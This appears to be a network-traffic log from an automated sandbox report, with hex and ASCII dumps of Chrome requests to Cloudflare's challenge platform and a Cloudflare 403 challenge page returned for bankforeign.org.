                                                            2024-02-01 20:38:13 UTC1369INData Raw: 5d 5b 69 69 28 39 30 36 29 5d 28 29 2c 66 78 5b 69 69 28 36 35 34 29 5d 5b 69 69 28 31 33 35 36 29 5d 28 29 2c 66 78 5b 69 69 28 31 31 34 35 29 5d 3d 21 21 5b 5d 2c 66 78 5b 65 5b 69 69 28 31 39 30 38 29 5d 5d 5b 69 69 28 31 30 30 31 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 69 69 28 31 34 34 33 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 66 78 5b 69 69 28 36 32 35 29 5d 5b 69 69 28 32 32 34 38 29 5d 2c 27 65 76 65 6e 74 27 3a 69 69 28 31 30 37 38 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 78 5b 69 69 28 36 32 35 29 5d 5b 69 69 28 34 39 35 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 66 78 5b 69 69 28 36 32 35 29 5d 5b 69 69 28 32 32 36 31 29 5d 2c 27 63 6f 64 65 27 3a 69 69 28 34 35 31 29 2c 27 72 63 56 27 3a 66 78 5b 69 69 28 36 32 35 29 5d 5b 69 69 28
                                                            Data Ascii: ][ii(906)](),fx[ii(654)][ii(1356)](),fx[ii(1145)]=!![],fx[e[ii(1908)]][ii(1001)]({'source':e[ii(1443)],'widgetId':fx[ii(625)][ii(2248)],'event':ii(1078),'cfChlOut':fx[ii(625)][ii(495)],'cfChlOutS':fx[ii(625)][ii(2261)],'code':ii(451),'rcV':fx[ii(625)][ii(
                                                            2024-02-01 20:38:13 UTC1369INData Raw: 7d 2c 66 78 5b 69 67 28 34 33 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c 68 2c 69 6b 2c 69 2c 6a 2c 6b 2c 6c 2c 6f 2c 73 2c 75 2c 76 2c 6d 29 7b 28 69 6b 3d 69 67 2c 69 3d 7b 7d 2c 69 5b 69 6b 28 31 34 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 5e 6f 7d 2c 69 5b 69 6b 28 31 39 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 69 6b 28 31 35 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 7c 6e 7d 2c 69 5b 69 6b 28 31 34 38 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2d 6f 7d 2c 69 5b 69 6b 28 31 38 33 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 5e 6f
                                                            Data Ascii: },fx[ig(430)]=function(d,e,f,g,h,ik,i,j,k,l,o,s,u,v,m){(ik=ig,i={},i[ik(1478)]=function(n,o){return n^o},i[ik(1965)]=function(n,o){return n+o},i[ik(1548)]=function(n,o){return o|n},i[ik(1480)]=function(n,o){return n-o},i[ik(1838)]=function(n,o){return n^o
                                                            2024-02-01 20:38:13 UTC1369INData Raw: 5d 28 74 68 69 73 2e 68 5b 32 31 31 2e 32 38 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 31 33 37 29 2b 32 35 36 26 32 35 35 2e 38 39 29 2c 73 26 26 28 6f 5b 30 5d 3d 75 2c 6f 5b 33 5d 3d 6a 5b 69 6b 28 39 39 32 29 5d 28 76 2c 31 38 33 29 29 29 3a 66 78 5b 69 6b 28 32 31 37 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 6c 29 7b 69 6c 3d 69 6b 2c 66 78 5b 69 6c 28 38 39 34 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6d 3d 5b 69 6b 28 32 32 30 36 29 2b 64 2c 6a 5b 69 6b 28 31 39 36 35 29 5d 28 6a 5b 69 6b 28 32 32 33 32 29 5d 2c 65 29 2c 6a 5b 69 6b 28 31 30 34 39 29 5d 2b 66 2c 6a 5b 69 6b 28 31 39 36 35 29 5d 28 69 6b 28 31 34 31 30 29 2c 67 29 2c 6a 5b 69 6b 28 31 34 36 34 29 5d 28 6a 5b 69 6b 28 36 32 36 29 5d 2c 4a 53 4f 4e 5b 69 6b 28 32 31 32 31 29 5d 28 68 29
                                                            Data Ascii: ](this.h[211.28^this.g][0]++),137)+256&255.89),s&&(o[0]=u,o[3]=j[ik(992)](v,183))):fx[ik(2170)](function(il){il=ik,fx[il(894)]()},1e3):(m=[ik(2206)+d,j[ik(1965)](j[ik(2232)],e),j[ik(1049)]+f,j[ik(1965)](ik(1410),g),j[ik(1464)](j[ik(626)],JSON[ik(2121)](h)
                                                            2024-02-01 20:38:13 UTC1369INData Raw: 39 29 29 2c 69 5b 69 71 28 34 36 36 29 5d 28 69 71 28 31 33 33 30 29 2c 66 78 5b 69 71 28 36 32 35 29 5d 5b 69 71 28 31 30 33 35 29 5d 29 2c 69 5b 69 71 28 31 32 39 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 75 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 75 2c 76 2c 44 2c 77 29 7b 69 66 28 69 75 3d 69 71 2c 66 5b 69 75 28 37 38 33 29 5d 21 3d 3d 66 5b 69 75 28 32 32 38 34 29 5d 29 7b 69 66 28 6c 3d 69 75 28 37 32 38 29 2c 69 5b 69 75 28 34 34 31 29 5d 21 3d 34 29 72 65 74 75 72 6e 3b 28 6d 3d 74 68 69 73 5b 69 75 28 31 32 33 39 29 5d 28 66 5b 69 75 28 36 34 37 29 5d 29 2c 66 5b 69 75 28 31 38 32 38 29 5d 28 6d 2c 69 75 28 31 31 30 39 29 29 29 26 26 28 6e 3d 4a 53 4f 4e 5b 69 75 28 38 36 35 29 5d 28 69 5b 69 75 28 31 31 37 30 29 5d 29 2c 6e 5b 69 75 28 37 30 38 29 5d
                                                            Data Ascii: 9)),i[iq(466)](iq(1330),fx[iq(625)][iq(1035)]),i[iq(1299)]=function(iu,l,m,n,o,s,u,v,D,w){if(iu=iq,f[iu(783)]!==f[iu(2284)]){if(l=iu(728),i[iu(441)]!=4)return;(m=this[iu(1239)](f[iu(647)]),f[iu(1828)](m,iu(1109)))&&(n=JSON[iu(865)](i[iu(1170)]),n[iu(708)]
                                                            2024-02-01 20:38:13 UTC1369INData Raw: 28 35 32 37 29 5d 3d 66 42 2c 66 44 3d 7b 7d 2c 66 44 5b 69 67 28 31 31 32 39 29 5d 3d 69 67 28 34 38 32 29 2c 66 44 5b 69 67 28 32 30 32 34 29 5d 3d 69 67 28 31 36 34 39 29 2c 66 44 5b 69 67 28 37 37 32 29 5d 3d 69 67 28 34 37 37 29 2c 66 44 5b 69 67 28 31 39 34 31 29 5d 3d 69 67 28 36 33 36 29 2c 66 44 5b 69 67 28 32 31 35 34 29 5d 3d 69 67 28 34 39 34 29 2c 66 44 5b 69 67 28 32 32 39 31 29 5d 3d 69 67 28 31 34 35 31 29 2c 66 44 5b 69 67 28 31 31 39 33 29 5d 3d 69 67 28 31 30 35 31 29 2c 66 44 5b 69 67 28 31 34 31 34 29 5d 3d 69 67 28 37 34 36 29 2c 66 44 5b 69 67 28 34 39 33 29 5d 3d 69 67 28 31 35 34 31 29 2c 66 44 5b 69 67 28 31 35 35 33 29 5d 3d 69 67 28 31 39 35 33 29 2c 66 44 5b 69 67 28 32 31 38 35 29 5d 3d 69 67 28 37 36 33 29 2c 66 44 5b 69 67
                                                            Data Ascii: (527)]=fB,fD={},fD[ig(1129)]=ig(482),fD[ig(2024)]=ig(1649),fD[ig(772)]=ig(477),fD[ig(1941)]=ig(636),fD[ig(2154)]=ig(494),fD[ig(2291)]=ig(1451),fD[ig(1193)]=ig(1051),fD[ig(1414)]=ig(746),fD[ig(493)]=ig(1541),fD[ig(1553)]=ig(1953),fD[ig(2185)]=ig(763),fD[ig
                                                            2024-02-01 20:38:13 UTC1369INData Raw: 28 31 31 32 34 29 2c 66 46 5b 69 67 28 31 35 35 33 29 5d 3d 69 67 28 31 39 31 34 29 2c 66 46 5b 69 67 28 32 31 38 35 29 5d 3d 69 67 28 31 37 35 39 29 2c 66 46 5b 69 67 28 39 34 39 29 5d 3d 69 67 28 32 31 38 31 29 2c 66 46 5b 69 67 28 32 32 34 33 29 5d 3d 69 67 28 32 65 33 29 2c 66 46 5b 69 67 28 31 36 34 31 29 5d 3d 69 67 28 31 39 38 37 29 2c 66 46 5b 69 67 28 31 38 39 36 29 5d 3d 69 67 28 38 32 36 29 2c 66 46 5b 69 67 28 35 33 30 29 5d 3d 69 67 28 32 30 36 36 29 2c 66 46 5b 69 67 28 32 31 35 31 29 5d 3d 69 67 28 31 33 39 38 29 2c 66 46 5b 69 67 28 31 35 33 38 29 5d 3d 69 67 28 32 30 39 32 29 2c 66 46 5b 69 67 28 31 35 31 35 29 5d 3d 69 67 28 35 33 38 29 2c 66 46 5b 69 67 28 32 31 35 32 29 5d 3d 69 67 28 38 32 33 29 2c 66 46 5b 69 67 28 31 32 30 32 29 5d
                                                            Data Ascii: (1124),fF[ig(1553)]=ig(1914),fF[ig(2185)]=ig(1759),fF[ig(949)]=ig(2181),fF[ig(2243)]=ig(2e3),fF[ig(1641)]=ig(1987),fF[ig(1896)]=ig(826),fF[ig(530)]=ig(2066),fF[ig(2151)]=ig(1398),fF[ig(1538)]=ig(2092),fF[ig(1515)]=ig(538),fF[ig(2152)]=ig(823),fF[ig(1202)]
                                                            2024-02-01 20:38:13 UTC1369INData Raw: 29 2c 66 47 5b 69 67 28 31 30 32 36 29 5d 3d 69 67 28 36 39 31 29 2c 66 47 5b 69 67 28 32 32 38 32 29 5d 3d 69 67 28 37 39 39 29 2c 66 47 5b 69 67 28 31 37 31 31 29 5d 3d 69 67 28 38 30 36 29 2c 66 47 5b 69 67 28 31 38 35 36 29 5d 3d 69 67 28 39 37 30 29 2c 66 47 5b 69 67 28 31 32 34 30 29 5d 3d 69 67 28 32 30 36 35 29 2c 66 47 5b 69 67 28 34 33 32 29 5d 3d 69 67 28 31 35 32 32 29 2c 66 47 5b 69 67 28 37 39 32 29 5d 3d 69 67 28 31 31 36 35 29 2c 66 47 5b 69 67 28 31 31 37 37 29 5d 3d 69 67 28 31 31 30 38 29 2c 66 47 5b 69 67 28 31 34 31 37 29 5d 3d 69 67 28 31 35 31 36 29 2c 66 48 3d 7b 7d 2c 66 48 5b 69 67 28 31 31 32 39 29 5d 3d 69 67 28 31 37 38 37 29 2c 66 48 5b 69 67 28 32 30 32 34 29 5d 3d 69 67 28 37 34 33 29 2c 66 48 5b 69 67 28 37 37 32 29 5d 3d
                                                            Data Ascii: ),fG[ig(1026)]=ig(691),fG[ig(2282)]=ig(799),fG[ig(1711)]=ig(806),fG[ig(1856)]=ig(970),fG[ig(1240)]=ig(2065),fG[ig(432)]=ig(1522),fG[ig(792)]=ig(1165),fG[ig(1177)]=ig(1108),fG[ig(1417)]=ig(1516),fH={},fH[ig(1129)]=ig(1787),fH[ig(2024)]=ig(743),fH[ig(772)]=
                                                            2024-02-01 20:38:13 UTC1369INData Raw: 2c 66 4a 3d 7b 7d 2c 66 4a 5b 69 67 28 31 31 32 39 29 5d 3d 69 67 28 39 34 31 29 2c 66 4a 5b 69 67 28 32 30 32 34 29 5d 3d 69 67 28 31 38 37 33 29 2c 66 4a 5b 69 67 28 37 37 32 29 5d 3d 69 67 28 31 36 39 36 29 2c 66 4a 5b 69 67 28 31 39 34 31 29 5d 3d 69 67 28 38 38 38 29 2c 66 4a 5b 69 67 28 32 31 35 34 29 5d 3d 69 67 28 31 35 32 35 29 2c 66 4a 5b 69 67 28 32 32 39 31 29 5d 3d 69 67 28 39 35 36 29 2c 66 4a 5b 69 67 28 31 31 39 33 29 5d 3d 69 67 28 31 37 37 34 29 2c 66 4a 5b 69 67 28 31 34 31 34 29 5d 3d 69 67 28 31 37 36 38 29 2c 66 4a 5b 69 67 28 34 39 33 29 5d 3d 69 67 28 37 34 35 29 2c 66 4a 5b 69 67 28 31 35 35 33 29 5d 3d 69 67 28 31 34 31 35 29 2c 66 4a 5b 69 67 28 32 31 38 35 29 5d 3d 69 67 28 36 32 33 29 2c 66 4a 5b 69 67 28 39 34 39 29 5d 3d 69
                                                            Data Ascii: ,fJ={},fJ[ig(1129)]=ig(941),fJ[ig(2024)]=ig(1873),fJ[ig(772)]=ig(1696),fJ[ig(1941)]=ig(888),fJ[ig(2154)]=ig(1525),fJ[ig(2291)]=ig(956),fJ[ig(1193)]=ig(1774),fJ[ig(1414)]=ig(1768),fJ[ig(493)]=ig(745),fJ[ig(1553)]=ig(1415),fJ[ig(2185)]=ig(623),fJ[ig(949)]=i
                                                            2024-02-01 20:38:13 UTC1369INData Raw: 38 35 29 2c 66 4c 5b 69 67 28 31 35 35 33 29 5d 3d 69 67 28 31 38 34 31 29 2c 66 4c 5b 69 67 28 32 31 38 35 29 5d 3d 69 67 28 35 30 38 29 2c 66 4c 5b 69 67 28 39 34 39 29 5d 3d 69 67 28 31 38 31 32 29 2c 66 4c 5b 69 67 28 32 32 34 33 29 5d 3d 69 67 28 31 37 34 34 29 2c 66 4c 5b 69 67 28 31 36 34 31 29 5d 3d 69 67 28 31 37 31 34 29 2c 66 4c 5b 69 67 28 31 38 39 36 29 5d 3d 69 67 28 31 30 31 31 29 2c 66 4c 5b 69 67 28 35 33 30 29 5d 3d 69 67 28 39 34 37 29 2c 66 4c 5b 69 67 28 32 31 35 31 29 5d 3d 69 67 28 31 32 30 38 29 2c 66 4c 5b 69 67 28 31 35 33 38 29 5d 3d 69 67 28 31 39 38 31 29 2c 66 4c 5b 69 67 28 31 35 31 35 29 5d 3d 69 67 28 34 36 35 29 2c 66 4c 5b 69 67 28 32 31 35 32 29 5d 3d 69 67 28 32 32 30 38 29 2c 66 4c 5b 69 67 28 31 32 30 32 29 5d 3d 69
                                                            Data Ascii: 85),fL[ig(1553)]=ig(1841),fL[ig(2185)]=ig(508),fL[ig(949)]=ig(1812),fL[ig(2243)]=ig(1744),fL[ig(1641)]=ig(1714),fL[ig(1896)]=ig(1011),fL[ig(530)]=ig(947),fL[ig(2151)]=ig(1208),fL[ig(1538)]=ig(1981),fL[ig(1515)]=ig(465),fL[ig(2152)]=ig(2208),fL[ig(1202)]=i


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.449751104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:13 UTC786OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:13 UTC248INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:13 GMT
                                                            Content-Type: image/png
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff2c9b9cb0ac-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:13 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                            Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                            2024-02-01 20:38:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.449752104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:13 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:13 UTC248INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:13 GMT
                                                            Content-Type: image/png
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff30eb0c69f7-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:13 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                            Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                            2024-02-01 20:38:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.449753104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:14 UTC858OUTGET /favicon.ico HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://bankforeign.org/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:15 UTC1355INHTTP/1.1 403 Forbidden
                                                            Date: Thu, 01 Feb 2024 20:38:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 13867
                                                            Connection: close
                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Resource-Policy: same-origin
                                                            Origin-Agent-Cluster: ?1
                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            Referrer-Policy: same-origin
                                                            X-Frame-Options: SAMEORIGIN
                                                            cf-mitigated: challenge
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KJolI7yEwfhDYjAdjyKxyiqwt8uFoWSCz9Jbvw4kvB7IOVBhFuKk6tIfgcVlND9%2BppF1a%2BMwZb6zMKY19dilN6P7CupMleLknnWVaPsVEvGu1n6Df8oIpGlhHxPkpKHk2og%3D"}],"group":"cf-nel","max_age":604800}
                                                            2024-02-01 20:38:15 UTC149INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 34 65 63 66 66 33 38 63 64 31 66 34 34 65 64 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84ecff38cd1f44ed-ATLalt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:15 UTC1234INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c
                                                            Data Ascii: IzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1L
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 69 67 68 74 2d 6d 6f 64 65 3b 7d 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 26 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32
                                                            Data Ascii: ight-mode;}}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3;&:hover{text-decoration:underline;color:#ee730a}}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon{margin-right:.5rem;width:2
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61
                                                            Data Ascii: MS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:conta
